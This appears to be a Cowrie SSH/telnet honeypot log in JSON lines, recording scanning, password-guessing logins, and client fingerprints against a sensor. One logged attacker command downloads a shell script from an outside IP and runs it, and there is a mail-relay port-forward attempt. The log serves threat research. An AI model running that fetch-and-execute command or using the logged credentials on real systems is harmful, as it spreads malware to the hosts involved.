{"eventid":"cowrie.client.version","version":"\u0003\u0000\u0000/*\\xe0\u0000\u0000\u0000\u0000\u0000Cookie: mstshash=Administr","message":"Remote SSH version: \u0003\u0000\u0000/*\\xe0\u0000\u0000\u0000\u0000\u0000Cookie: mstshash=Administr","sensor":"my-vps","timestamp":"2025-08-26T15:26:03.111038Z","src_ip":"212.227.235.229","session":"1ac46706dccb"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:26:03.111935Z","src_ip":"212.227.235.229","session":"1ac46706dccb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:26:12.743849Z","src_ip":"212.227.235.229","session":"344b5f4958d5"}
{"eventid":"cowrie.session.closed","duration":180.27087426185608,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:26:12.750236Z","src_ip":"212.227.235.229","session":"344b5f4958d5"}
{"eventid":"cowrie.session.closed","duration":30.625266551971436,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:26:21.363778Z","src_ip":"212.227.125.160","session":"6a2d6d0dc74d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35760,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f060e973aa7","protocol":"ssh","message":"New connection: 212.227.125.160:35760 (1.2.3.4:22) [session: 5f060e973aa7]","sensor":"my-vps","timestamp":"2025-08-26T15:26:59.329175Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T15:26:59.330285Z","src_ip":"212.227.125.160","session":"5f060e973aa7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T15:26:59.378094Z","src_ip":"212.227.125.160","session":"5f060e973aa7"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:26:59.602324Z","src_ip":"212.227.125.160","session":"5f060e973aa7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T15:26:59.728563Z","src_ip":"212.227.125.160","session":"5f060e973aa7"}
{"eventid":"cowrie.command.input","input":"wget http://23.146.184.21/adb.sh; chmod 777 *; sh adb.sh x86","message":"CMD: wget http://23.146.184.21/adb.sh; chmod 777 *; sh adb.sh x86","sensor":"my-vps","timestamp":"2025-08-26T15:26:59.729328Z","src_ip":"212.227.125.160","session":"5f060e973aa7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/958e74ac463ee3e75e7731e9747ee99a246446506abef9b030bfa21e76109516","size":138,"shasum":"958e74ac463ee3e75e7731e9747ee99a246446506abef9b030bfa21e76109516","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/958e74ac463ee3e75e7731e9747ee99a246446506abef9b030bfa21e76109516 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:26:59.780665Z","src_ip":"212.227.125.160","session":"5f060e973aa7"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:26:59.829358Z","src_ip":"212.227.125.160","session":"5f060e973aa7"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":21253,"dst_ip":"1.2.3.4","dst_port":22,"session":"a95c2e885a83","protocol":"ssh","message":"New connection: 80.94.95.112:21253 (1.2.3.4:22) [session: a95c2e885a83]","sensor":"my-vps","timestamp":"2025-08-26T15:27:11.517191Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T15:27:11.518108Z","src_ip":"80.94.95.112","session":"a95c2e885a83"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T15:27:11.548948Z","src_ip":"80.94.95.112","session":"a95c2e885a83"}
{"eventid":"cowrie.login.failed","username":"admin","password":"reaver","message":"login attempt [admin/reaver] failed","sensor":"my-vps","timestamp":"2025-08-26T15:27:11.759297Z","src_ip":"80.94.95.112","session":"a95c2e885a83"}
{"eventid":"cowrie.login.failed","username":"admin","password":"ralphie","message":"login attempt [admin/ralphie] failed","sensor":"my-vps","timestamp":"2025-08-26T15:27:12.792910Z","src_ip":"80.94.95.112","session":"a95c2e885a83"}
{"eventid":"cowrie.login.failed","username":"admin","password":"raketa","message":"login attempt [admin/raketa] failed","sensor":"my-vps","timestamp":"2025-08-26T15:27:13.825463Z","src_ip":"80.94.95.112","session":"a95c2e885a83"}
{"eventid":"cowrie.login.failed","username":"admin","password":"rainer","message":"login attempt [admin/rainer] failed","sensor":"my-vps","timestamp":"2025-08-26T15:27:14.859845Z","src_ip":"80.94.95.112","session":"a95c2e885a83"}
{"eventid":"cowrie.login.failed","username":"admin","password":"radius","message":"login attempt [admin/radius] failed","sensor":"my-vps","timestamp":"2025-08-26T15:27:15.892889Z","src_ip":"80.94.95.112","session":"a95c2e885a83"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:27:16.926361Z","src_ip":"80.94.95.112","session":"a95c2e885a83"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":3475,"dst_ip":"1.2.3.4","dst_port":22,"session":"9407dd4248d0","protocol":"ssh","message":"New connection: 212.227.235.229:3475 (1.2.3.4:22) [session: 9407dd4248d0]","sensor":"my-vps","timestamp":"2025-08-26T15:27:32.672266Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T15:27:32.673207Z","src_ip":"212.227.235.229","session":"9407dd4248d0"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T15:27:32.801532Z","src_ip":"212.227.235.229","session":"9407dd4248d0"}
{"eventid":"cowrie.login.success","username":"root","password":"11112222","message":"login attempt [root/11112222] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:27:33.410763Z","src_ip":"212.227.235.229","session":"9407dd4248d0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"212.227.235.229","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-26T15:27:33.540407Z","session":"9407dd4248d0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-26T15:27:33.668963Z","src_ip":"212.227.235.229","session":"9407dd4248d0"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:27:33.797883Z","src_ip":"212.227.235.229","session":"9407dd4248d0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34188,"dst_ip":"1.2.3.4","dst_port":22,"session":"fadca58b7b12","protocol":"ssh","message":"New connection: 212.227.235.229:34188 (1.2.3.4:22) [session: fadca58b7b12]","sensor":"my-vps","timestamp":"2025-08-26T15:28:05.399934Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T15:28:05.400823Z","src_ip":"212.227.235.229","session":"fadca58b7b12"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T15:28:05.661102Z","src_ip":"212.227.235.229","session":"fadca58b7b12"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:28:13.400865Z","src_ip":"212.227.235.229","session":"fadca58b7b12"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41892,"dst_ip":"1.2.3.4","dst_port":23,"session":"e1e9e4a09f41","protocol":"telnet","message":"New connection: 212.227.125.160:41892 (1.2.3.4:23) [session: e1e9e4a09f41]","sensor":"my-vps","timestamp":"2025-08-26T15:29:05.419982Z"}
{"eventid":"cowrie.session.closed","duration":30.985578775405884,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:29:36.405483Z","src_ip":"212.227.125.160","session":"e1e9e4a09f41"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41912,"dst_ip":"1.2.3.4","dst_port":23,"session":"b54125c7c3dc","protocol":"telnet","message":"New connection: 212.227.125.160:41912 (1.2.3.4:23) [session: b54125c7c3dc]","sensor":"my-vps","timestamp":"2025-08-26T15:29:46.298509Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33828,"dst_ip":"1.2.3.4","dst_port":23,"session":"57eb4934391b","protocol":"telnet","message":"New connection: 212.227.125.160:33828 (1.2.3.4:23) [session: 57eb4934391b]","sensor":"my-vps","timestamp":"2025-08-26T15:29:56.091903Z"}
{"eventid":"cowrie.session.closed","duration":31.108253955841064,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:30:17.406689Z","src_ip":"212.227.125.160","session":"b54125c7c3dc"}
{"eventid":"cowrie.session.closed","duration":30.47808575630188,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:30:26.569902Z","src_ip":"212.227.125.160","session":"57eb4934391b"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":56686,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c90080819e1","protocol":"ssh","message":"New connection: 217.72.205.35:56686 (1.2.3.4:22) [session: 9c90080819e1]","sensor":"my-vps","timestamp":"2025-08-26T15:30:38.459833Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:30:38.461765Z","src_ip":"217.72.205.35","session":"9c90080819e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49904,"dst_ip":"1.2.3.4","dst_port":23,"session":"6e6d4ad4d9cb","protocol":"telnet","message":"New connection: 212.227.125.160:49904 (1.2.3.4:23) [session: 6e6d4ad4d9cb]","sensor":"my-vps","timestamp":"2025-08-26T15:31:51.617725Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50136,"dst_ip":"1.2.3.4","dst_port":23,"session":"bc3b47cde205","protocol":"telnet","message":"New connection: 212.227.125.160:50136 (1.2.3.4:23) [session: bc3b47cde205]","sensor":"my-vps","timestamp":"2025-08-26T15:32:10.742939Z"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":43836,"dst_ip":"1.2.3.4","dst_port":22,"session":"92cc03b47912","protocol":"ssh","message":"New connection: 45.88.8.215:43836 (1.2.3.4:22) [session: 92cc03b47912]","sensor":"my-vps","timestamp":"2025-08-26T15:32:22.388945Z"}
{"eventid":"cowrie.session.closed","duration":31.559871435165405,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:32:23.177519Z","src_ip":"212.227.125.160","session":"6e6d4ad4d9cb"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T15:32:23.186957Z","src_ip":"45.88.8.215","session":"92cc03b47912"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T15:32:23.188176Z","src_ip":"45.88.8.215","session":"92cc03b47912"}
{"eventid":"cowrie.login.success","username":"root","password":"Nanda@123","message":"login attempt [root/Nanda@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T15:32:25.303005Z","src_ip":"45.88.8.215","session":"92cc03b47912"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:32:25.633440Z","src_ip":"45.88.8.215","session":"92cc03b47912"}
{"eventid":"cowrie.session.closed","duration":30.690964698791504,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:32:41.433834Z","src_ip":"212.227.125.160","session":"bc3b47cde205"}
{"eventid":"cowrie.session.connect","src_ip":"104.152.52.135","src_port":33853,"dst_ip":"1.2.3.4","dst_port":22,"session":"8bf0587fb8b5","protocol":"ssh","message":"New connection: 104.152.52.135:33853 (1.2.3.4:22) [session: 8bf0587fb8b5]","sensor":"my-vps","timestamp":"2025-08-26T15:32:46.853112Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T15:32:46.853874Z","src_ip":"104.152.52.135","session":"8bf0587fb8b5"}
{"eventid":"cowrie.client.kex","hassh":"9052c4ab4164c78256e71143dcfc7eac","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 9052c4ab4164c78256e71143dcfc7eac","sensor":"my-vps","timestamp":"2025-08-26T15:32:46.960685Z","src_ip":"104.152.52.135","session":"8bf0587fb8b5"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:32:47.070194Z","src_ip":"104.152.52.135","session":"8bf0587fb8b5"}
{"eventid":"cowrie.session.connect","src_ip":"205.210.31.227","src_port":52761,"dst_ip":"1.2.3.4","dst_port":23,"session":"b3e3a1d5c71a","protocol":"telnet","message":"New connection: 205.210.31.227:52761 (1.2.3.4:23) [session: b3e3a1d5c71a]","sensor":"my-vps","timestamp":"2025-08-26T15:33:01.569522Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60544,"dst_ip":"1.2.3.4","dst_port":23,"session":"9ce43edb2536","protocol":"telnet","message":"New connection: 212.227.125.160:60544 (1.2.3.4:23) [session: 9ce43edb2536]","sensor":"my-vps","timestamp":"2025-08-26T15:33:22.371356Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51324,"dst_ip":"1.2.3.4","dst_port":23,"session":"c1c049e7acc9","protocol":"telnet","message":"New connection: 212.227.125.160:51324 (1.2.3.4:23) [session: c1c049e7acc9]","sensor":"my-vps","timestamp":"2025-08-26T15:33:23.607804Z"}
{"eventid":"cowrie.session.closed","duration":30.939216375350952,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:33:32.508664Z","src_ip":"205.210.31.227","session":"b3e3a1d5c71a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55896,"dst_ip":"1.2.3.4","dst_port":23,"session":"3f5e1dded2e3","protocol":"telnet","message":"New connection: 212.227.125.160:55896 (1.2.3.4:23) [session: 3f5e1dded2e3]","sensor":"my-vps","timestamp":"2025-08-26T15:33:37.314449Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38460,"dst_ip":"1.2.3.4","dst_port":23,"session":"4b23d4505740","protocol":"telnet","message":"New connection: 212.227.125.160:38460 (1.2.3.4:23) [session: 4b23d4505740]","sensor":"my-vps","timestamp":"2025-08-26T15:33:51.503840Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38472,"dst_ip":"1.2.3.4","dst_port":23,"session":"9ea25f1a0c6c","protocol":"telnet","message":"New connection: 212.227.125.160:38472 (1.2.3.4:23) [session: 9ea25f1a0c6c]","sensor":"my-vps","timestamp":"2025-08-26T15:33:53.090335Z"}
{"eventid":"cowrie.session.closed","duration":30.98879885673523,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:33:53.360084Z","src_ip":"212.227.125.160","session":"9ce43edb2536"}
{"eventid":"cowrie.session.closed","duration":33.593294620513916,"message":"Connection lost after 33 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:33:57.201025Z","src_ip":"212.227.125.160","session":"c1c049e7acc9"}
{"eventid":"cowrie.session.closed","duration":31.128807544708252,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:34:08.443177Z","src_ip":"212.227.125.160","session":"3f5e1dded2e3"}
{"eventid":"cowrie.session.closed","duration":30.942973375320435,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:34:22.444792Z","src_ip":"212.227.125.160","session":"4b23d4505740"}
{"eventid":"cowrie.session.closed","duration":30.272818088531494,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T15:34:23.363066Z","src_ip":"212.227.125.160","session":"9ea25f1a0c6c"}
